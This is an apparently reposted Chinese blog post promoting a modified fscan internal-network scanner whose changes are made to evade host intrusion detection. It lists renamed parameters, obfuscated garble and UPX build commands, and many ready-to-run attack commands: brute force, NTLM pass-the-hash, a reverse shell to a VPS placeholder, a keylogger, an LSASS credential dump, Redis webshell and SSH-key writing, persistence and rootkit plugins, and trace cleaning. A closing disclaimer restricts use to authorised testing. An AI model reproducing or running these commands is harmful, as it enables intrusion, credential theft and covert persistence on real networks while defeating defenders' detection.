Fscan魔改版:专为红队场景打造的内网扫描工具

admin 2026-09-10 04:51:15 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍基于fscanv2.1.3魔改的内网扫描工具,通过参数混淆、去除特征字符串及garble构建降低被HIDS识别概率。文章详述参数映射关系、实战命令、后渗透插件、构建方法及WebUI模式,适用于授权渗透测试和红队演练场景。 综合评分: 65 文章分类: 红队,内网渗透,安全工具,免杀


Fscan魔改版:专为红队场景打造的内网扫描工具

幻泉之洲

2026年9月8日 10:32 北京

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

基于fscan v2.1.3修改的内网扫描工具,参数全部混淆、去除特征字符串,配合garble构建可大幅降低被HIDS识别的概率。本文梳理了魔改版的参数映射关系、完整用法和实战命令。

做内网渗透的都知道fscan。扫描快、功能全、一条命令搞定存活探测到弱口令爆破。问题是原版的参数名和特征早就进了各家的检测规则库,上去扫一圈,蓝队的告警比你的扫描结果还多。

这个魔改版解决的就是这件事。它把命令行参数全部改了名,去掉了启动时的Banner和版本信息,Go模块路径也不叫fscan了。再配合garble混淆构建和UPX压缩,官方的说法是能有效规避HIDS特征检测。

工具地址:基于 shadow1ng/fscan v2.1.3 修改,原项目见 https://github.com/shadow1ng/fscan 。官方建议配合 https://github.com/webzzaa/pscan-loader 使用,效果更好。

01 魔改了什么

先说清楚,这不是重新开发的工具,是在原版fscan基础上做的针对性修改。改动集中在四个方面:

  • 参数名全部换了,比如原来的-h(帮助)现在是-t(目标)
  • 启动时不再打印fscan的ASCII Logo和版本号
  • Go模块路径改成test,二进制里搜不到fscan关键字
  • 源码中所有fscan相关字符串清理干净

参数对照表如下,用惯了原版的需要适应一下:

| 原版参数 | 魔改后 | 说明 | | — | — | — | | -h | -t | 目标IP/网段/域名 | | -eh | -et | 排除主机 | | -ehf | -etf | 排除主机文件 | | -p / -p-tp | -tp | 端口 | | -ep | -etp | 排除端口 | | -hf(原主机文件) | -tf | 主机列表文件 | | -pf(原端口文件) | -tpf | 端口列表文件 | | -userf | -uf | 用户名字典 | | -pwdf | -pf | 密码字典 | | -uf(原URL文件) | -urlf | URL列表文件 | | -u(原URL) | -url | Web目标URL | | -user | -usr | 用户名 | | -pwd | -pw | 密码 | | -usera | -ua | 额外用户名 | | -pwda | -pa | 额外密码 | | -upf | -up | 用户名:密码对文件 | | -hash | -hv | 哈希值 | | -hashf | -hf | 哈希文件 | | -domain | -dm | 域名 | | -sshkey | -sk | SSH私钥 | | -m | -st | 扫描模式 | | -t(线程) | -tn | 端口扫描线程数 | | -time | -tm | 超时时间(秒) | | -o | -out | 输出文件 | | -f | -fmt | 输出格式 |

说实话,参数映射这一步适应成本不高,用两次就记住了。关键是构建环节,官方强调必须用garble,不要用普通go build。后面构建章节会给出完整命令。

02 快速上手

最基本的用法,一条命令扫完C段:

扫描一个C段(存活探测+端口扫描+服务识别+弱口令爆破+POC)

fscan.exe -t 192.168.1.0/24

仅存活探测

fscan.exe -t 192.168.1.0/24 -ao

扫描单个主机

fscan.exe -t 192.168.1.100

扫描多个IP段

fscan.exe -t 192.168.1.0/24,10.0.0.0/24

从文件读取目标

fscan.exe -tf targets.txt

和原版的区别就是参数名变了。默认行为也一样:先ICMP存活探测,然后端口扫描,识别服务,自动跑弱口令爆破和POC检测。如果只是想快速看看哪些主机活着,加-ao就行。

这里有个细节值得注意:默认会扫1000个常用端口,爆破也是自动开的。如果只想做端口扫描和服务识别,记得加-nobr,不然爆破模块会拖慢整体进度。

03 常用实战场景

端口与协议控制

指定端口扫描:

扫描指定端口

fscan.exe -t 192.168.1.0/24 -tp 22,80,443,3306,3389,6379

扫描常用Web端口

fscan.exe -t 192.168.1.0/24 -tp 80,81,443,8080,8443,9090

排除特定端口

fscan.exe -t 192.168.1.0/24 -etp 445,139

跳过Ping探测(禁Ping环境用)

fscan.exe -t 192.168.1.0/24 -np

流量大的环境要注意限速,-rate参数可以控制每分钟最大发包数。默认600线程扫C段速度很快,但某些IDS对突发连接敏感,降到200线程、rate限制到1000会安静很多。参数是-tn 200 -rate 1000

弱口令爆破

默认自动爆破,可以指定自定义凭据:

指定单个凭据

fscan.exe -t 192.168.1.0/24 -usr admin -pw admin123

使用字典文件

fscan.exe -t 192.168.1.0/24 -uf users.txt -pf pass.txt

用户名:密码对文件(每行user:pass)

fscan.exe -t 192.168.1.0/24 -up creds.txt

添加额外凭据(与原字典合并)

fscan.exe -t 192.168.1.0/24 -ua root,admin -pa 123456,password

哈希传递也直接支持:

NTLM哈希传递

fscan.exe -t 192.168.1.100 -hv “aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0”

批量哈希传递

fscan.exe -t 192.168.1.0/24 -hf hashes.txt

Web扫描与POC检测

支持独立Web扫描模式:

扫描单个Web站点

fscan.exe -url http://192.168.1.100:8080

带Cookie扫描

fscan.exe -url http://192.168.1.100 -cookie “PHPSESSID=xxx”

使用HTTP代理

fscan.exe -url http://192.168.1.100 -proxy http://127.0.0.1:8080

POC有几种模式:默认跑内置的常见漏洞检测,-full跑全量POC(更慢但更全),-pocname指定单个POC,-pocpath加载自定义POC目录。

后渗透功能

魔改版内置了不少后渗透插件,通过-local参数调用:

列出所有本地插件

fscan.exe -local list

反弹Shell(先在外网VPS监听)

fscan.exe -local reverseshell -rsh your-vps.com:4444

启动SOCKS5代理(本地监听1080)

fscan.exe -local socks5proxy -start-socks5 1080

键盘记录

fscan.exe -local keylogger -keylog-output keylog.txt

LSASS凭证提取

fscan.exe -local minidump

插件列表挺全的:Windows持久化有注册表、计划任务、服务、启动项、WMI、BITS、IFEO等七八种方式,Linux有Cron、Systemd、LD_PRELOAD。清理痕迹用-local cleaner,杀软检测用-local avdetect。具体完整的插件表可以参考下面这个列表:

| 插件名 | 功能 | 平台 | | — | — | — | | systeminfo | 系统信息收集 | 全平台 | | reverseshell | 反弹Shell | 全平台 | | forwardshell | 正向Shell | Windows | | socks5proxy | SOCKS5代理 | 全平台 | | keylogger | 键盘记录 | Windows | | minidump | LSASS凭据提取 | Windows | | sshkey | SSH公钥注入 | Linux | | cleaner | 痕迹清理 | 全平台 | | crontask | Cron持久化 | Linux | | ldpreload | LD_PRELOAD Rootkit | Linux | | winregistry | 注册表持久化 | Windows | | winschtask | 计划任务持久化 | Windows | | winwmi | WMI持久化 | Windows | | avdetect | 杀软检测 | Windows | | download | 文件下载 | 全平台 |

04 支持的爆破服务

覆盖了内网常见的协议:

  • 数据库:MySQL(3306)、MSSQL(1433)、Oracle(1521)、PostgreSQL(5432)、Redis(6379)、MongoDB(27017)、Elasticsearch(9200)
  • 远程服务:SSH(22)、FTP(21)、Telnet(23)、SMB(445)、RDP(3389)、VNC(5900)
  • 其他:LDAP(389)、SMTP(25)、SNMP(161/UDP)、Rsync(873)、Memcached(11211)、RabbitMQ(5672)、Kafka(9092)、Zookeeper(2181)等等

Redis比较特殊,除了爆破还支持写公钥、写WebShell:

Redis写公钥

fscan.exe -t 192.168.1.100 -st redis -rs “ssh-rsa AAAAB3N…”

Redis写WebShell

fscan.exe -t 192.168.1.100 -st redis -rwp /var/www/html -rwc “

05 扫描模式

通过-st指定模式。常用的几个:

| 模式 | 说明 | | — | — | | all | 默认,完整扫描流程 | | icmp | 仅ICMP存活探测 | | portscan | 仅端口扫描 | | redis | 仅Redis扫描+利用 | | ssh | 仅SSH扫描+爆破 | | mysql | 仅MySQL扫描+爆破 | | smb | 仅SMB扫描+MS17010 | | rdp | 仅RDP扫描+爆破 |

其他服务插件名也可以直接作为模式传入。比如只想扫MSSQL,就-st mssql。这个设计比原版灵活,适合目标明确的时候做精准打击。

06 构建方法

此版本必须用garble混淆构建,普通go build不会产生预期效果。

标准版(garble混淆构建)

garble -tiny -literals -seed=random build -ldflags=”-s -w -buildid=” -trimpath -o fscan.exe .

精简版(不含后渗透模块)

garble -tiny -literals -seed=random build -tags nolocal -ldflags=”-s -w -buildid=” -trimpath -o fscan-nolocal.exe .

Web版

garble -tiny -literals -seed=random build -tags web -ldflags=”-s -w -buildid=” -trimpath -o fscan-web.exe .

UPX压缩(LZMA算法,约30MB压缩到8-10MB)

upx –best –lzma fscan.exe -o fscan-upx.exe

几个参数的含义:-literals混淆字符串和整数字面量,-tiny剥离符号表并缩减PE段表,-seed=random每次构建生成不同的混淆结果,-buildid=清空build ID去掉编译器指纹。UPX用--best --lzma对Go二进制的压缩率最好。

注意-o输出到新文件,保留garble原始产物作为备份,这样出问题时还能回溯。

07 WebUI模式

-tags web编译出来的Web版内置了管理界面,启动后访问 http://127.0.0.1:8080 。功能包括图形化扫描任务管理、实时WebSocket结果推送、扫描预设保存、资产项目管理,支持中文和英文切换,还有深色模式。

适合团队协作场景,不用每个人都记命令行参数。

08 输出控制

默认输出到result.txt,可以指定格式:

JSON输出

fscan.exe -t 192.168.1.0/24 -fmt json -out result.json

CSV输出

fscan.exe -t 192.168.1.0/24 -fmt csv -out result.csv

不保存文件

fscan.exe -t 192.168.1.0/24 -no

静默模式

fscan.exe -t 192.168.1.0/24 -silent

性能统计

fscan.exe -t 192.168.1.0/24 -perf


总的来说,这个魔改版的核心价值就两个:去特征、加后渗透。参数混淆降低了被检测的概率,内置的持久化和凭据提取插件让它在拿到权限之后还能继续用。适应成本就是记住新参数名,大概十分钟的事。

适合授权渗透测试和红队演练中使用。内网扫描场景基本可以替代原版fscan,前提是你对参数映射足够熟悉。

获取方式:私信回复”pscan”获取


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:幻泉之洲 《Fscan魔改版:专为红队场景打造的内网扫描工具》

评论:0   参与:  0